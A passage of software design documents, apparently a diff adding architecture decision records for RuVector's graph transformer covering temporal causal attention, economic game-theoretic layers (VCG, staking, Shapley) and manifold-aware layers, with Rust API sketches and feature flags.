/// from ruvector-dag::dag::traversal (ProofTier::Standard).
pub fn extract(
&self,
attention_history: &[AttentionSnapshot],
timestamps: &[f64],
env: &mut ProofEnvironment,
) -> Result<ProofGate<GrangerGraph>>;
}
```
### Delta Chain Integration
Temporal compression via `ruvector-temporal-tensor`:
```rust
/// Temporal embedding storage with delta chain compression.
///
/// Bridges to ruvector-temporal-tensor::delta::DeltaChain for
/// storing node embedding histories as base + sparse deltas.
/// Retrieval of h_v(t) for any historical time t is O(chain_length).
///
/// Tiered storage (hot/warm/cold) via ruvector-temporal-tensor::tiering
/// keeps recent embeddings in memory and older ones on disk.
pub struct TemporalEmbeddingStore {
/// Delta chain per node.
chains: Vec<DeltaChain>,
/// Tier policy from ruvector-temporal-tensor.
tier_policy: TierPolicy,
}
impl TemporalEmbeddingStore {
/// Store a new embedding snapshot for node v at time t.
/// Computes delta from previous snapshot and appends to chain.
pub fn store(&mut self, node: NodeId, time: f64, embedding: &[f32]);
/// Retrieve embedding at historical time t via delta replay.
pub fn retrieve(&self, node: NodeId, time: f64) -> Option<Vec<f32>>;
/// Compact old deltas according to tier policy.
pub fn compact(&mut self);
}
```
### Proof-Gated Temporal Mutations
| Operation | Proof Requirement | Tier | Latency |
|-----------|------------------|------|---------|
| Timestamp ordering (causal mask) | `t_new > t_predecessor` | Reflex | < 10 ns |
| Retrocausal mode check | Batch mode token valid | Reflex | < 10 ns |
| ODE error bound | Local truncation error < atol | Standard(100) | < 1 us |
| Granger DAG acyclicity | Topological sort succeeds | Standard(500) | < 5 us |
| Interventional propagation | Causal cone completeness | Deep | < 50 us |
### Feature Flag
```toml
# In crates/ruvector-graph-transformer/Cargo.toml
[features]
temporal = [
"ruvector-dag/attention",
"ruvector-temporal-tensor",
"ruvector-graph/temporal",
]
```
## Consequences
### Positive
- Causal ordering is enforced by the proof system, preventing future information leakage that corrupts online predictions
- Retrocausal safety is enforced at the type level (`BatchModeToken`), making it impossible to accidentally use bidirectional attention in streaming mode
- Continuous-time ODE handles irregular event streams without discretization artifacts
- Granger causality extraction produces auditable causal graphs with structural certificates
- Delta chain compression reduces temporal embedding storage by 10-100x compared to full snapshots
### Negative
- Causal masking reduces effective attention receptive field compared to full (non-causal) attention
- Neural ODE integration with adaptive stepping has variable compute cost per forward pass
- Granger causality extraction requires accumulating attention history, adding O(T * n^2 / sparsity) memory
- Delta chain retrieval for deep historical queries is O(chain_length), not O(1)
### Risks
- In streaming mode with high event rates (>10K events/sec), causal cone computation may become a bottleneck. Mitigation: maintain incremental ancestor sets using `ruvector-dag::dag::traversal` with cached topological order
- ODE solver may fail to converge for stiff graph dynamics. Mitigation: fall back to implicit Euler with Newton iteration when adaptive RK45 exceeds max_steps
- Retrocausal attention smoothing may overfit to the specific temporal window available in batch mode. Mitigation: temporal cross-validation with held-out future windows
## Implementation
1. Create `crates/ruvector-graph-transformer/src/temporal/mod.rs` re-exporting all types
2. Implement `CausalGraphTransformer` in `temporal/causal.rs`, bridging to `ruvector-dag::attention::causal_cone`
3. Implement `RetrocausalAttention` in `temporal/retrocausal.rs` with `BatchModeToken` type safety
4. Implement `ContinuousTimeODE` in `temporal/ode.rs` with adaptive Dormand-Prince integration
5. Implement `GrangerCausalityExtractor` in `temporal/granger.rs` using `ruvector-dag::dag::traversal`
6. Implement `TemporalEmbeddingStore` in `temporal/store.rs`, bridging to `ruvector-temporal-tensor::delta::DeltaChain`
7. Add benchmark: `benches/temporal_bench.rs` measuring causal attention throughput on a 100K-event stream over 10K nodes
8. Integration test: streaming causal attention for 1,000 events + Granger extraction, verify DAG acyclicity certificate
9. Verify build: `cargo test --features temporal -p ruvector-graph-transformer`
## References
- ADR-046: Graph Transformer Unified Architecture (module structure, `temporal` feature flag)
- ADR-047: Proof-Gated Mutation Protocol (`ProofGate<T>`, timestamp ordering invariants)
- ADR-049: Verified Training Pipeline (temporal invariant checking during training)
- Research: `docs/research/gnn-v2/28-temporal-causal-graph-transformers.md`
- `crates/ruvector-dag/src/attention/causal_cone.rs`: `CausalConeAttention`, `MaskStrategy`
- `crates/ruvector-dag/src/attention/temporal_btsp.rs`: BTSP attention with eligibility traces
- `crates/ruvector-dag/src/attention/topological.rs`: topological attention
- `crates/ruvector-dag/src/dag/traversal.rs`: topological sort, ancestor/descendant queries
- `crates/ruvector-dag/src/dag/query_dag.rs`: query DAG construction
- `crates/ruvector-temporal-tensor/src/delta.rs`: `DeltaChain` for sparse delta compression
- `crates/ruvector-temporal-tensor/src/tier_policy.rs`: `TierPolicy` for hot/warm/cold storage
- `crates/ruvector-temporal-tensor/src/tiering.rs`: tiered storage implementation
- `crates/ruvector-attention/src/hyperbolic/lorentz_cascade.rs`: `LorentzCascadeAttention`
- `crates/ruvector-verified/src/gated.rs`: `ProofTier`, `route_proof`
- Granger, "Investigating Causal Relations by Econometric Models and Cross-spectral Methods" (Econometrica, 1969)
- Chen et al., "Neural Ordinary Differential Equations" (NeurIPS, 2018)
- Pearl, "Causality: Models, Reasoning, and Inference" (Cambridge, 2009)

View File

@@ -0,0 +1,332 @@
# ADR-054: Economic Graph Transformer Layers
## Status
Accepted
## Date
2026-02-25
## Context
Standard graph neural networks assume cooperative nodes: every vertex computes its feature update faithfully and passes honest messages. This assumption fails in federated learning, multi-stakeholder knowledge graphs, decentralized finance, supply chain networks, and autonomous vehicle coordination -- settings where nodes belong to independent agents with competing objectives. Without economic reasoning, GNNs are vulnerable to free-riding, Sybil attacks, and strategic information withholding.
RuVector already contains the economic and game-theoretic building blocks:
- `ruvector-economy-wasm/src/stake.rs`: staking and slashing mechanisms
- `ruvector-economy-wasm/src/reputation.rs`: reputation scoring and decay
- `ruvector-economy-wasm/src/ledger.rs`: CRDT-based distributed ledger
- `ruvector-economy-wasm/src/curve.rs`: bonding curves for token economics
- `ruvector-dag/src/qudag/tokens/staking.rs`: stake-weighted DAG consensus
- `ruvector-dag/src/qudag/tokens/rewards.rs`: reward distribution
- `ruvector-dag/src/qudag/tokens/governance.rs`: governance token mechanics
- `ruvector-dag/src/qudag/consensus.rs`: Byzantine fault-tolerant consensus
- `ruvector-verified/src/gated.rs`: proof-gated verification for budget proofs
However, there is no module that embeds game-theoretic reasoning into graph attention itself -- attention as Nash equilibrium, VCG mechanisms for truthful message passing, Shapley attribution for fair contribution measurement, or market-based routing for attention bandwidth allocation. The research at `docs/research/gnn-v2/29-economic-graph-transformers.md` describes the theory but defines no implementation path through existing crate APIs.
## Decision
We will implement an `economic` module in `ruvector-graph-transformer` behind the `economic` feature flag (not in the default feature set due to the additional complexity and dependency on `ruvector-economy-wasm`). The module provides four layer types: `GameTheoreticAttention`, `VcgMessagePassing`, `IncentiveAlignedMPNN`, and `ShapleyAttention`.
### GameTheoreticAttention
Nash equilibrium computation via iterated best response:
```rust
/// Game-theoretic attention where each node maximizes expected payoff.
///
/// Replaces softmax(QK^T / sqrt(d)) with equilibrium attention:
/// each node selects an attention distribution that maximizes
/// U_v(sigma_v, sigma_{-v}) = relevance - cost + externality.
///
/// Convergence: O(log(1/epsilon)) rounds for potential games,
/// O(1/epsilon^2) for general games. In practice 3-5 rounds suffice.
pub struct GameTheoreticAttention {
/// Per-node utility parameters [relevance_w, cost_w, externality_w].
utility_weights: Vec<[f32; 3]>,
/// Strategy temperature (controls exploration vs exploitation).
temperature: f32,
/// Best-response iterations to approximate Nash equilibrium.
best_response_iters: usize,
/// Convergence threshold (L-infinity distance between rounds).
convergence_threshold: f32,
/// Proof requirement: equilibrium convergence certificate.
equilibrium_proof: ProofRequirement,
}
impl GameTheoreticAttention {
/// Compute equilibrium attention weights.
///
/// Initializes with uniform attention, then iterates best response:
/// each node selects softmax(payoff / temperature) over neighbors.
///
/// Proof gate: verifies convergence (max strategy change < threshold)
/// via ProofTier::Standard. If not converged after max iterations,
/// falls back to standard softmax attention and logs a warning.
pub fn compute_equilibrium(
&self,
queries: &[f32],
keys: &[f32],
values: &[f32],
graph: &impl GraphRepr,
env: &mut ProofEnvironment,
) -> Result<ProofGate<EquilibriumOutput>>;
/// Compute social welfare: sum of all nodes' utilities at equilibrium.
pub fn social_welfare(&self, equilibrium: &EquilibriumOutput) -> f64;
/// Compute Price of Anarchy: ratio of optimal welfare to equilibrium welfare.
pub fn price_of_anarchy(
&self,
equilibrium: &EquilibriumOutput,
optimal: &AttentionOutput,
) -> f64;
}
```
### VcgMessagePassing
Vickrey-Clarke-Groves mechanism for truthful message passing:
```rust
/// VCG mechanism for incentive-compatible graph message passing.
///
/// Allocation rule: attention mechanism selects message weights.
/// Payment rule: each node pays a tax equal to the externality
/// its message imposes on others.
///
/// payment(u -> v) = sum_{w != u} U_w(alloc_with_u)
/// - sum_{w != u} U_w(alloc_without_u)
///
/// Truthful reporting is a dominant strategy under VCG.
pub struct VcgMessagePassing {
/// Base attention mechanism for allocation.
base_attention: Box<dyn SublinearGraphAttention>,
/// Number of samples for approximate VCG (reduces O(n^2) to O(n log n)).
vcg_samples: usize,
/// Proof requirement: incentive compatibility certificate.
incentive_proof: ProofRequirement,
}
impl VcgMessagePassing {
/// Forward pass with VCG payments.
///
/// 1. Compute attention allocation with all nodes.
/// 2. For each sampled node u, recompute allocation without u.
/// 3. Payment(u) = marginal externality.
///
/// Proof gate: verifies individual rationality (all payments >= 0
/// for non-strategic nodes) and approximate budget balance
/// (sum of payments within epsilon of zero).
/// Routes to ProofTier::Standard (sum computation).
pub fn forward(
&self,
features: &[f32],
graph: &impl GraphRepr,
env: &mut ProofEnvironment,
) -> Result<ProofGate<VcgOutput>>;
}
pub struct VcgOutput {
/// Message passing output (node features).
pub features: Vec<f32>,
/// Per-node VCG payments.
pub payments: Vec<f64>,
/// Budget surplus (should be near zero).
pub budget_surplus: f64,
}
```
### IncentiveAlignedMPNN
Stake-weighted messaging with slashing from `ruvector-economy-wasm`:
```rust
/// Incentive-aligned message passing with stake and reputation.
///
/// Bridges to:
/// - ruvector_economy_wasm::stake::StakeRegistry for stake management
/// - ruvector_economy_wasm::reputation::ReputationScore for quality tracking
/// - ruvector_economy_wasm::ledger::CrdtLedger for distributed state
///
/// Nodes must stake tokens to send messages. Messages from high-reputation
/// nodes receive amplified attention. Low-quality messages trigger slashing.
pub struct IncentiveAlignedMPNN {
/// Stake registry from ruvector-economy-wasm.
stake_registry: StakeRegistry,
/// Reputation ledger (CRDT-based).
reputation_ledger: CrdtLedger,
/// Message quality model (learned scorer).
quality_model: MessageQualityModel,
/// Slashing fraction for low-quality messages.
slash_fraction: f64,
/// Minimum stake to participate in message passing.
min_stake: u64,
/// Proof requirement: stake sufficiency.
stake_proof: ProofRequirement,
}
impl IncentiveAlignedMPNN {
/// Forward pass with economic incentives.
///
/// 1. Verify each sender has sufficient stake (ProofTier::Reflex).
/// 2. Weight messages by reputation * stake.
/// 3. Score message quality after aggregation.
/// 4. Update reputation: high-quality messages earn reputation,
/// low-quality messages lose reputation and stake.
///
/// Returns both the updated features and an economic ledger update
/// recording all stake movements and reputation changes.
pub fn forward(
&mut self,
features: &[f32],
graph: &impl GraphRepr,
env: &mut ProofEnvironment,
) -> Result<ProofGate<EconomicOutput>>;
/// Slash a node for provably bad behavior.
/// Requires proof of misbehavior via ruvector-verified.
pub fn slash(
&mut self,
node: NodeId,
proof: &ProofAttestation,
) -> Result<SlashResult>;
}
pub struct EconomicOutput {
pub features: Vec<f32>,
pub ledger_update: LedgerUpdate,
pub slashed_nodes: Vec<NodeId>,
pub total_stake_moved: u64,
}
```
### ShapleyAttention
Fair attribution via Monte Carlo Shapley values:
```rust
/// Shapley attention for fair contribution attribution.
///
/// Computes the Shapley value of each neighbor's message to each
/// target node. The Shapley value is the average marginal contribution
/// over all possible orderings of neighbors.
///
/// Exact computation is O(2^|N(v)|) per node, so we use Monte Carlo
/// approximation with configurable sample count.
pub struct ShapleyAttention {
/// Number of Monte Carlo permutations per node.
num_permutations: usize,
/// Base attention mechanism for evaluating coalitions.
base_attention: Box<dyn SublinearGraphAttention>,
/// Proof requirement: Shapley efficiency (values sum to v(N)).
efficiency_proof: ProofRequirement,
}
impl ShapleyAttention {
/// Compute Shapley attention values.
///
/// For each target node v, samples random orderings of N(v),
/// computes marginal contribution of each neighbor at its
/// position in the ordering, and averages.
///
/// Proof gate: verifies Shapley efficiency axiom --
/// sum of Shapley values equals total coalition value v(N(v)).
/// Routes to ProofTier::Standard (sum comparison).
pub fn forward(
&self,
features: &[f32],
graph: &impl GraphRepr,
env: &mut ProofEnvironment,
) -> Result<ProofGate<ShapleyOutput>>;
}
pub struct ShapleyOutput {
/// Updated node features.
pub features: Vec<f32>,
/// Per-edge Shapley values (attribution weights).
pub shapley_values: Vec<f64>,
}
```
### Proof-Gated Economic Invariants
| Operation | Proof Requirement | Tier | Latency |
|-----------|------------------|------|---------|
| Stake sufficiency check | `stake >= min_stake` | Reflex | < 10 ns |
| Equilibrium convergence | Max strategy delta < threshold | Standard(200) | < 2 us |
| VCG individual rationality | All payments >= 0 | Standard(100) | < 1 us |
| VCG budget balance | `|sum(payments)| < epsilon` | Standard(100) | < 1 us |
| Shapley efficiency | `sum(phi_i) == v(N)` | Standard(100) | < 1 us |
| Slashing proof | Proof of misbehavior valid | Deep | < 100 us |
### Feature Flag
```toml
# In crates/ruvector-graph-transformer/Cargo.toml
[features]
economic = [
"ruvector-economy-wasm",
"ruvector-dag/tokens",
]
```
The `economic` feature is intentionally NOT part of the `default` or `full` feature sets. Users must explicitly opt in because it introduces economic state (staking, reputation) that requires careful lifecycle management.
## Consequences
### Positive
- Incentive compatibility via VCG ensures nodes cannot profit from sending dishonest messages
- Stake-weighted messaging makes Sybil attacks economically prohibitive (each fake identity requires its own stake)
- Shapley attribution provides theoretically fair contribution measurement, enabling equitable reward distribution in federated graph learning
- Game-theoretic attention reveals the economic structure of the graph (which nodes are strategic, which are cooperative)
- Proof-gated economic invariants create an auditable trail of all stake movements and slashing events
### Negative
- Nash equilibrium computation adds O(best_response_iters * n * avg_degree) overhead per attention layer
- VCG payments require recomputing attention without each sampled node, adding O(vcg_samples * n) cost
- Shapley Monte Carlo approximation has O(num_permutations * avg_degree) variance per node
- Economic state (stake registry, reputation ledger) adds persistent state that must be serialized and recovered across sessions
- The `economic` feature introduces a dependency on `ruvector-economy-wasm`, which is a WASM-target crate; native builds require the `ruvector-economy-wasm` crate to expose a native API
### Risks
- Game-theoretic attention may not converge for adversarial graph topologies (star graphs with a single high-degree node). Mitigation: fallback to standard softmax after max iterations with a logged convergence failure
- VCG approximate budget balance (via sampling) may have high variance for small sample counts. Mitigation: adaptive sampling that increases count until budget surplus stabilizes below epsilon
- Slashing without proper adjudication creates centralization risk. Mitigation: slashing requires a `ProofAttestation` (Deep tier) proving the misbehavior, preventing unilateral slashing
- Token economics (bonding curves from `ruvector-economy-wasm::curve`) may create perverse incentives if parameters are misconfigured. Mitigation: parameter bounds enforced via proof gate (min/max stake, max slash fraction)
## Implementation
1. Create `crates/ruvector-graph-transformer/src/economic/mod.rs` re-exporting all types
2. Implement `GameTheoreticAttention` in `economic/game_theory.rs` with iterated best response
3. Implement `VcgMessagePassing` in `economic/vcg.rs` with approximate VCG via sampling
4. Implement `IncentiveAlignedMPNN` in `economic/incentive.rs`, bridging to `ruvector-economy-wasm::{stake, reputation, ledger}`
5. Implement `ShapleyAttention` in `economic/shapley.rs` with Monte Carlo Shapley approximation
6. Add benchmark: `benches/economic_bench.rs` measuring equilibrium convergence on a 10K-node graph with 5 best-response rounds
7. Integration test: `IncentiveAlignedMPNN` with 100 nodes, inject 10 adversarial nodes, verify slashing and reputation update
8. Verify build: `cargo test --features economic -p ruvector-graph-transformer`
## References
- ADR-046: Graph Transformer Unified Architecture (module structure, `AttentionRegistry`)
- ADR-047: Proof-Gated Mutation Protocol (`ProofGate<T>`, economic invariant proofs)
- ADR-048: Sublinear Graph Attention (`SublinearGraphAttention` trait used by VCG and Shapley)
- Research: `docs/research/gnn-v2/29-economic-graph-transformers.md`
- `crates/ruvector-economy-wasm/src/stake.rs`: `StakeRegistry`, staking/slashing
- `crates/ruvector-economy-wasm/src/reputation.rs`: `ReputationScore`, decay
- `crates/ruvector-economy-wasm/src/ledger.rs`: `CrdtLedger` for distributed state
- `crates/ruvector-economy-wasm/src/curve.rs`: bonding curves
- `crates/ruvector-dag/src/qudag/tokens/staking.rs`: stake-weighted consensus
- `crates/ruvector-dag/src/qudag/tokens/rewards.rs`: reward distribution
- `crates/ruvector-dag/src/qudag/consensus.rs`: BFT consensus
- `crates/ruvector-verified/src/gated.rs`: `ProofTier`, `route_proof`
- `crates/ruvector-verified/src/proof_store.rs`: `ProofAttestation`
- Vickrey, "Counterspeculation, Auctions, and Competitive Sealed Tenders" (J Finance, 1961)
- Clarke, "Multipart Pricing of Public Goods" (Public Choice, 1971)
- Shapley, "A Value for n-Person Games" (Contributions to Theory of Games, 1953)
- Nash, "Equilibrium Points in N-Person Games" (PNAS, 1950)

View File

@@ -0,0 +1,403 @@
# ADR-055: Manifold-Aware Graph Transformer Layers
## Status
Accepted
## Date
2026-02-25
## Context
Nearly all deployed graph transformers operate in flat Euclidean space. This is a geometric mismatch: power-law degree distributions (social networks, citation graphs) exhibit tree-like branching that requires exponentially many Euclidean dimensions to embed without distortion. Hierarchical structures embed naturally in hyperbolic space (exponential volume growth), cyclic substructures embed on spheres (positive curvature), and hybrid graphs require multiple curvature regimes simultaneously. A product manifold decomposition S^n x H^m x R^k captures all three regimes, but existing graph transformers do not operate natively in such spaces.
RuVector has substantial infrastructure for mixed-curvature operations:
- `ruvector-attention/src/hyperbolic/poincare.rs`: Poincare ball operations, `mobius_add`, `mobius_scalar_mult`, `frechet_mean`, geodesic distance with epsilon-buffered projection
- `ruvector-attention/src/hyperbolic/lorentz_cascade.rs`: `LorentzCascadeAttention` with Busemann scoring, Einstein midpoint aggregation, multi-curvature heads at logarithmically-spaced curvatures
- `ruvector-attention/src/hyperbolic/mixed_curvature.rs`: `MixedCurvatureAttention` combining Poincare and Lorentz models
- `ruvector-attention/src/curvature/fused_attention.rs`: `MixedCurvatureFusedAttention` with `FusedCurvatureConfig` for E x H x S product manifold
- `ruvector-attention/src/curvature/tangent_space.rs`: `TangentSpaceMapper` for 10-100x faster tangent-space operations
- `ruvector-attention/src/curvature/component_quantizer.rs`: quantization of mixed-curvature components
- `ruvector-attention/src/transport/sliced_wasserstein.rs`: `SlicedWassersteinAttention` for optimal transport on manifolds
- `ruvector-attention/src/transport/centroid_ot.rs`: `CentroidOTAttention` for centroid-based transport
- `ruvector-attention/src/sheaf/restriction.rs`: `RestrictionMap` for fiber bundle structure (Lie group equivariance)
- `ruvector-attention/src/sheaf/attention.rs`: `SheafAttention` for sheaf-structured attention
However, there is no module that provides curvature compatibility proofs before merging embeddings from different manifold components, geodesic message passing with parallel transport along shortest paths, Riemannian optimization (Riemannian Adam with exponential map), or Lie group equivariance (SE(3)/SO(3)) as a graph attention layer. The research at `docs/research/gnn-v2/27-hyperbolic-mixed-curvature-graph-transformers.md` describes the mathematics but defines no integration path with the proof-gated mutation protocol.
## Decision
We will implement a `manifold` module in `ruvector-graph-transformer` behind the `manifold` feature flag. The module provides `ProductManifoldAttention`, `CurvatureAdaptiveRouter`, `GeodesicMessagePassing`, `RiemannianAdamOptimizer`, and Lie group equivariance via sheaf bundle structure.
### ProductManifoldAttention
S^n x H^m x R^k product manifold attention with curvature compatibility proofs:
```rust
/// Product manifold attention on S^n x H^m x R^k.
///
/// Bridges to ruvector-attention::curvature::fused_attention for the
/// fused kernel. Before merging embeddings from different manifold
/// components, a curvature compatibility proof verifies that the
/// component curvatures are consistent (no NaN/Inf from mismatched
/// curvature parameters).
pub struct ProductManifoldAttention {
/// Fused curvature config from ruvector-attention.
fused_config: FusedCurvatureConfig,
/// Per-component learned curvatures (extends FusedCurvatureConfig
/// beyond its single hyperbolic_curvature to support per-head curvatures).
component_curvatures: Vec<f32>,
/// Tangent space mapper for efficient computation.
tangent_mapper: TangentSpaceMapper,
/// Proof requirement: curvature compatibility.
curvature_proof: ProofRequirement,
}
impl ProductManifoldAttention {
/// Product manifold attention forward pass.
///
/// Decomposes features into (spherical, hyperbolic, Euclidean)
/// components, computes attention in each space:
/// - Spherical: normalized inner product on S^n
/// - Hyperbolic: Busemann scoring via LorentzCascadeAttention
/// - Euclidean: standard scaled dot product
///
/// Merges via learned mixing weights: beta_S, beta_H, beta_E.
///
/// Proof gate: before merging, verifies curvature compatibility:
/// - Hyperbolic curvature c > 0 (no degenerate flat limit)
/// - Spherical embeddings on unit sphere (||x_S|| = 1 +/- eps)
/// - Poincare embeddings inside ball (c * ||x_H||^2 < 1 - margin)
/// Routes to ProofTier::Reflex (scalar/norm checks).
pub fn forward(
&self,
features: &[f32],
graph: &impl GraphRepr,
env: &mut ProofEnvironment,
) -> Result<ProofGate<ManifoldOutput>>;
/// Compute optimal curvature for the hyperbolic component.
///
/// kappa* = -4 * delta^2 / diam(G)^2
/// where delta is Gromov hyperbolicity (tree-likeness).
/// Uses ruvector-solver for sublinear graph traversal.
pub fn estimate_optimal_curvature(
&self,
graph: &impl GraphRepr,
) -> f32;
}
```
### CurvatureAdaptiveRouter
Routes attention to the geometrically appropriate manifold component:
```rust
/// Curvature-adaptive attention routing.
///
/// Analyzes local graph structure around each node to determine
/// which manifold component should receive the most attention weight.
/// Hierarchical neighborhoods (high tree-likeness) route to H^m;
/// clustered neighborhoods (many triangles) route to S^n;
/// flat/uniform neighborhoods route to R^k.
///
/// Bridges to ruvector-attention::curvature::{fused_attention, tangent_space}.
pub struct CurvatureAdaptiveRouter {
/// Fused attention for computing all components.
fused_attention: MixedCurvatureFusedAttention,
/// Tangent space mapper for local curvature estimation.
tangent_mapper: TangentSpaceMapper,
/// Learned routing weights per node.
routing_dim: usize,
}
impl CurvatureAdaptiveRouter {
/// Route attention based on local graph curvature.
///
/// For each node v, computes local Ollivier-Ricci curvature
/// (via neighbor overlap heuristic) and routes:
/// - kappa < -threshold -> hyperbolic component (H^m)
/// - kappa > +threshold -> spherical component (S^n)
/// - |kappa| <= threshold -> Euclidean component (R^k)
///
/// The routing decision is soft (sigmoid gating), not hard,
/// so gradients flow through all components.
pub fn forward(
&self,
features: &[f32],
graph: &impl GraphRepr,
env: &mut ProofEnvironment,
) -> Result<ProofGate<RoutedOutput>>;
}
```
### GeodesicMessagePassing
Message passing with parallel transport along shortest paths:
```rust
/// Geodesic message passing with Levi-Civita parallel transport.
///
/// Standard message passing aggregates: m_v = sum alpha_{vu} * W * h_u.
/// This assumes all values live in the same vector space (Euclidean).
/// On a manifold, values at different nodes live in different tangent
/// spaces. Aggregation requires parallel transport from T_{h_u}M
/// to T_{h_v}M along the geodesic connecting h_u and h_v.
///
/// For Poincare ball: transport uses gyration (Thomas precession).
/// For hyperboloid: transport uses Lorentz boost.
/// For sphere: transport uses rotation along great circle.
pub struct GeodesicMessagePassing {
/// Manifold type for transport computation.
manifold: ManifoldType,
/// Attention mechanism for computing weights.
attention: Box<dyn SublinearGraphAttention>,
/// Proof requirement: transport preserves vector norm.
transport_proof: ProofRequirement,
}
pub enum ManifoldType {
/// Poincare ball B^n_c with curvature c.
PoincareBall { curvature: f32 },
/// Lorentz hyperboloid H^n_c.
Lorentz { curvature: f32 },
/// Unit sphere S^n.
Sphere,
/// Product manifold with per-component types.
Product(Vec<ManifoldType>),
}
impl GeodesicMessagePassing {
/// Forward pass with parallel transport.
///
/// For each edge (u, v) with attention weight alpha_{vu}:
/// 1. Compute geodesic from h_u to h_v on the manifold.
/// 2. Parallel transport W * h_u along geodesic to T_{h_v}M.
/// 3. Aggregate transported values in T_{h_v}M.
/// 4. Map back to manifold via exponential map.
///
/// Proof gate: verifies ||transported_v||_g = ||v||_g (transport
/// preserves the Riemannian norm). Routes to ProofTier::Reflex
/// for norm comparison.
pub fn forward(
&self,
features: &[f32],
graph: &impl GraphRepr,
env: &mut ProofEnvironment,
) -> Result<ProofGate<GeodesicOutput>>;
/// Compute Frechet mean of neighbor embeddings on the manifold.
///
/// Uses iterative Riemannian gradient descent:
/// mu_{t+1} = Exp_{mu_t}(-eta * sum_i w_i * Log_{mu_t}(x_i))
/// Converges in O(1/epsilon) steps for non-negative curvature.
pub fn frechet_mean(
&self,
points: &[f32],
weights: &[f32],
dim: usize,
) -> Vec<f32>;
}
```
### RiemannianAdamOptimizer
Riemannian Adam for training on product manifolds:
```rust
/// Riemannian Adam optimizer for product manifold parameters.
///
/// Extends ruvector-attention::training::optimizer with Riemannian
/// operations: exponential map for parameter updates, parallel
/// transport for momentum, and Riemannian gradient rescaling.
///
/// Uses existing poincare.rs exp_map/log_map and
/// lorentz_cascade.rs tangent operations.
pub struct RiemannianAdamOptimizer {
/// Learning rate.
lr: f64,
/// Beta1 for first moment.
beta1: f64,
/// Beta2 for second moment.
beta2: f64,
/// Epsilon for numerical stability.
epsilon: f64,
/// Manifold type for exp/log map selection.
manifold: ManifoldType,
/// First moment estimates (in tangent space).
m: Vec<f32>,
/// Second moment estimates (scalar, no transport needed).
v: Vec<f32>,
/// Step counter.
t: u64,
}
impl RiemannianAdamOptimizer {
/// One optimization step on the product manifold.
///
/// 1. Compute Riemannian gradient: rescale Euclidean grad by
/// inverse metric (conformal factor for Poincare).
/// 2. Update first moment with parallel transport from old
/// tangent space to new tangent space.
/// 3. Update second moment (scalar, no transport).
/// 4. Bias-corrected update in tangent space.
/// 5. Exponential map back to manifold.
///
/// Proof gate: verifies updated parameters remain on manifold
/// (c * ||x||^2 < 1 for Poincare, <x,x>_L = -1/c for Lorentz).
/// Routes to ProofTier::Reflex (norm check).
pub fn step(
&mut self,
params: &mut [f32],
grad: &[f32],
env: &mut ProofEnvironment,
) -> Result<ProofGate<OptimizerStep>>;
}
```
### Lie Group Equivariance via Sheaf Bundle
SE(3)/SO(3) equivariance for 3D molecular and protein graphs:
```rust
/// Lie group equivariant attention via sheaf bundle structure.
///
/// Models the graph as a principal G-bundle where G is a Lie group
/// (SE(3) for rigid body, SO(3) for rotation). The fiber at each
/// node is a copy of G, and restriction maps from
/// ruvector-attention::sheaf serve as the connection (parallel
/// transport of G-representations along edges).
///
/// This is the manifold generalization of gauge-equivariant MP
/// (ADR-051): gauge invariance is Lie group equivariance where
/// the gauge group is a Lie group.
pub struct LieGroupEquivariantAttention {
/// Sheaf attention for bundle structure.
sheaf_attention: SheafAttention,
/// Lie group type.
group: LieGroupType,
/// Irreducible representation degrees (for SO(3): l = 0, 1, 2, ...).
irrep_degrees: Vec<usize>,
}
pub enum LieGroupType {
/// Special orthogonal group SO(3): rotations in 3D.
SO3,
/// Special Euclidean group SE(3): rotations + translations in 3D.
SE3,
/// Unitary group U(1): phase rotations (electromagnetism gauge).
U1,
}
impl LieGroupEquivariantAttention {
/// Equivariant forward pass.
///
/// Decomposes features into irreducible representations (irreps)
/// of the Lie group. For SO(3), these are spherical harmonics
/// at each degree l. Attention is computed per-irrep using
/// Clebsch-Gordan coefficients for tensor products.
///
/// Proof gate: verifies equivariance by checking that a random
/// group element g applied to input produces g-transformed output.
/// Routes to ProofTier::Deep (requires forward pass with
/// transformed input).
pub fn forward(
&self,
features: &[f32],
positions: &[f32], // 3D coordinates for SE(3)/SO(3)
graph: &impl GraphRepr,
env: &mut ProofEnvironment,
) -> Result<ProofGate<EquivariantOutput>>;
}
```
### Proof-Gated Manifold Invariants
| Operation | Proof Requirement | Tier | Latency |
|-----------|------------------|------|---------|
| Poincare ball containment | `c * \|\|x\|\|^2 < 1 - margin` | Reflex | < 10 ns |
| Sphere normalization | `\|\|x_S\|\| = 1 +/- eps` | Reflex | < 10 ns |
| Hyperboloid constraint | `<x,x>_L = -1/c +/- eps` | Reflex | < 10 ns |
| Transport norm preservation | `\|\|Gamma(v)\|\|_g = \|\|v\|\|_g` | Reflex | < 10 ns |
| Curvature positivity | `c > 0` | Reflex | < 10 ns |
| Frechet mean convergence | Residual norm < atol | Standard(200) | < 2 us |
| Equivariance check | Random group test | Deep | < 100 us |
| Optimal curvature estimation | Graph traversal for Gromov delta | Standard(500) | < 10 us |
### Feature Flag
```toml
# In crates/ruvector-graph-transformer/Cargo.toml
[features]
manifold = [
"ruvector-attention/math",
]
```
The `math` feature on `ruvector-attention` gates the hyperbolic, curvature, sheaf, and transport submodules. For Lie group equivariance, an additional sub-feature is available:
```toml
manifold-lie = ["manifold", "ruvector-attention/sheaf"]
```
## Consequences
### Positive
- Hyperbolic components embed hierarchies with O(log n) dimensions instead of O(n) in Euclidean space, reducing model size by orders of magnitude for tree-like graphs
- Spherical components capture cyclic/cluster structure without wasting capacity on non-existent hierarchy
- Curvature compatibility proofs prevent NaN/Inf from mismatched curvature parameters, a common silent failure mode in mixed-curvature training
- Geodesic message passing with parallel transport is geometrically correct, unlike Euclidean aggregation in curved spaces which introduces systematic bias
- Riemannian Adam enables direct optimization on the product manifold without projection bias
- Lie group equivariance guarantees SE(3)/SO(3) symmetry for molecular and protein graphs
### Negative
- Poincare ball operations near the boundary (||x|| -> 1/sqrt(c)) suffer from numerical instability; epsilon-buffered projection mitigates but introduces small errors
- Frechet mean iteration does not have closed-form convergence rate for negative curvature; may require many iterations for widely-spread point sets
- Riemannian Adam adds ~2x overhead per step compared to Euclidean Adam due to exp/log map computations (mitigated by tangent-space approximation for small step sizes)
- Lie group equivariance via Clebsch-Gordan coefficients is O(l^3) per tensor product at degree l; high-degree irreps are expensive
### Risks
- Learned curvatures may collapse to zero (degenerate flat limit), losing the benefit of curved geometry. Mitigation: curvature lower bound enforced via proof gate (c > c_min = 0.01)
- Mixed-curvature training is known to be sensitive to learning rate; too-large steps may leave the manifold. Mitigation: Riemannian Adam with manifold constraint proofs at every step
